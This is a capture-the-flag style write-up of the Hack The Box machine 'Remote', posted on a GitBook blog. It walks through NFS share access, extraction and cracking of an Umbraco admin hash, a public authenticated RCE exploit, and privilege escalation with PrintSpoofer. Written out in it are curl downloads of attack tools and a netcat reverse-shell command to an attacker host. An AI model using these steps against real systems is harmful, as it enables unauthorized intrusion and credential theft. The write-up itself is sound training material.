> For the complete documentation index, see [llms.txt](https://blind0bandit.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-remote.md).
# HTB - Remote
**Scope**
{% hint style="success" %}
IP Address 10.10.10.180
{% endhint %}
## **Enumeration**
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-time:
| date: 2024-07-06T02:24:29
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
```
* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous login
```
### Service Enumeration
#### **FTP**
I noticed from Nmap that `anonymous login` is allowed but It didn't lead for anything
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]
```
#### **SMB**
SMB Enumeration didn't lead for anything, too
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.180 445 REMOTE [-] remote\: STATUS_ACCESS_DENIED
```
#### **RPC**
The Same as SMB :(
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
```
#### **NFS**
I Found `2049` port open which is used by `network file system (NFS)`, So I'll check if there is any accessible folders
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip
Export list for 10.10.10.180:
/site_backups (everyone)
```
I Found an interesting folder, So I'll mount it to my host and see its content
```bash
──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers App_Plugins Global.asax Umbraco Views aspnet_client css scripts
App_Data Config Media Umbraco_Client Web.config bin default.aspx
```
I tried to hunt for usernames & passwords, but nothing appears using `grep` command, So I searched online for `Umbraco CMS` and where it stores its credentials and I found this:
The `CMS` stores its credentials in `Umbraco.sdf`. After knowing this, I tried to open the file with text editor but it's binary file, so I list its content with `strings` and grep for credentials
```bash
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
```
So the file says that the hash is `SHA1`, let's fire up `hashcat` and crack it after getting the hashcat mode
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx
Session..........: hashcat
Status...........: Cracked
```
## Initial Access
***
At `http://10.10.10.180/umbraco/` there is a login form.
I logged in with the credentials found before, then looked for the webapp version
I decided to search for public CVE with `searchsploit`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
```
I searched for poc on GitHub this match the version of the webapp and found this one:
{% embed url="" %}
I clone it locally and run the exploit
```bash
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>
```
```PowerShell
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx
```
{% hint style="info" %}
User flag 442f18b8accdec694dxxxxxxxxxxx
{% endhint %}
***
## Privilege Escalation
When I typed `whoami` command and saw the output, I knew it's an easy win cause user `iis apppool\defaultapppool` often has `SeImpersonatePrivilege` which can be used to escalate to system using `RoguePotato` or `PrintSpoofer`
```PowerShell
PS C:\Users\Public> whoami
iis apppool\defaultapppool
```
Let's verify
```
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
I downloaded `PrintSpoofer.exe` & `nc.exe` from my attack host
```PowerShell
PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe
```
Easy win :)
```PowerShell
PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719
PS C:\Windows\system32> whoami
nt authority\system
```
```PowerShell
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx
```
{% hint style="info" %}
root flag 60ea8c532b06a17faxxxxxxxxxxxxxxx
{% endhint %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-remote.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.